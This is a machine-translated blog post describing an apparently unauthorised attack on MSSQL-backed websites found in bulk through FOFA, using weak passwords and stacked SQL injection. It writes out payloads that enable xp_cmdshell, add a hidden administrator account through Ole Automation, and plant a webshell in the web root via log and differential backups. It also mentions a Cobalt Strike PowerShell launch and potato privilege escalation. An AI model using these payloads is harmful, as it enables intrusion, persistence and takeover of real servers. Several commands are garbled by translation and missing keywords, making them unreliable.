Remember a stack injection to get a summary of the shell

Vegetable chicken in the first actual combat encountered MSSQL stack injection, big guys light spray.

Stack injection MSSQL stack injection MSSQL stack injection MSSQL stack injection

Stacked injection

Because in SQL queries, the semicolon “;” Represents the end of a query statement. So add another SQL statement after the semicolon at the end of the execution SQL statement, resulting in stacked injection.

This situation is much like a federated query, except that a federated query executes a limited number of statements that can only be used to execute the query, whereas a stacked injection can execute any statement.

Vegetable chicken will not audit PHP code, here will not post SQL statement source code.

Here’s the infiltration process first, FOFA finds the target in bulk

The front page starts with a wave of weak passwords

In fact, there are a few weak password directly into the background, but the background does not have any getShell point

It can only be in the background of the login window to try injection, packet capture test

SQL > insert into MSSQL database; SQL > insert into MSSQL database

Ping dNSlog to see if you can execute the command

For another thought, try xp_cmdshell

Manually open the xp_cmdshell and find that the function is not disabled and can execute the command

EXEC sp\_configure 'show advanced options',1; RECONFIGURE; EXEC sp\_configure 'xp_cmdshell',1; RECONFIGURE;Copy the code

Try injecting cs powershell directly into powershell

EXEC master.. Xp_cmdshell 'no kill powershell'Copy the code

Sweet potato is proposed to system

Even the xp_cmdshell command is not disabled, presumably there is no kill software.

First look at processes. Emmm has so many Powershell processes… There is no need to play.

Can try to trace a wave, next article.

There’s no Intranet. Call it a day.

conclusion

The reason for this is that there is no kill software and the commands are not blocked. Here’s what to do if xp_cmdshell is disabled.

1. The sp_configure function

Command to enable the sp_configure function

EXEC sp\_configure 'show advanced options', 1;  RECONFIGURE WITH OVERRIDE;  EXEC sp\_configure 'Ole Automation Procedures', 1;  RECONFIGURE WITH OVERRIDE;  EXEC sp_configure 'show advanced options', 0;
Copy the code

No command output is displayed

The following command adds a shadow user and adds it to the administrator group

declare @shell int exec sp\_oacreate 'wscript.shell',@shell output exec sp\_oamethod @shell,'run',null,'c:\\windows\\system32\\cmd.exe /c net user hack$ 0r@nge /add'; declare @shell int exec sp\_oacreate 'wscript.shell',@shell output exec sp\_oamethod @shell,'run',null,'c:\\windows\\system32\\cmd.exe /c net localgroup administrators 0r@nge$ /add';Copy the code

There are other functions that I’m not going to list here.

In many cases, the above two functions do not execute (there is killing software). MSSQL databases can use the following two methods

2. Log Backup write shell

Prerequisites:

1. The database has been injected

2. The user has the read and write permission, or at least the DBO permission

3. Have a specific path to the website

4. There is no separation between the station and the library

Moreover, the volume of the horse backed up by this method is very small, and the possibility of successful backup is very high.

Steps:

1. Change database to restore mode (restore mode) :

;alter database 库名 set RECOVERY FULL –-
Copy the code

3. Create tables and fields

; create table orange(a image)--Copy the code

3. Back up the database

; To disk = 'c:\\ WWW \[email protected]' with init --Copy the code

4. Write a sentence to the table

; insert into orange(a) values (0x...) -- // The value should be hex convertedCopy the code

5. Use log to back up data to the web page

; To disk = 'c:\\ WWW \[email protected]' with init--Copy the code

6. Delete table

; Drop table orange--Copy the code

Differential backup write shell

Concept: Back up data that has changed since the last full backup. During differential backup, only those selected files and folders marked are backed up. It does not clear the mark, that is, the backup file is not marked as backed up. In other words, archive attributes are not cleared.

In words: the second backup, compared with the last full backup, different content backup down, so as long as we insert a word Trojan, backup again, a word will be written to the database.

Condition:

1. There is a specific path to the website

2. Write permission (above DBO permission)

3. The station library is not separated

1. Back up the database

; Backup database to disk = 'C:\ WWW \\... ' with init --Copy the code

2. Create a table

% '; create table orange(a image) --Copy the code

3. Write webshell

% '; insert into orange(a) values (0xxxxx) --Copy the code

4. Perform differential backup

% '; Backup log database name to disk = 'C:\ WWW \orange.asp' WITH DIFFERENTIAL,FORMAT; --Copy the code

5. Delete table

; Drop table orange--Copy the code

These are all theories, and they can be filtered in real life, and you have to modify the payload to bypass them.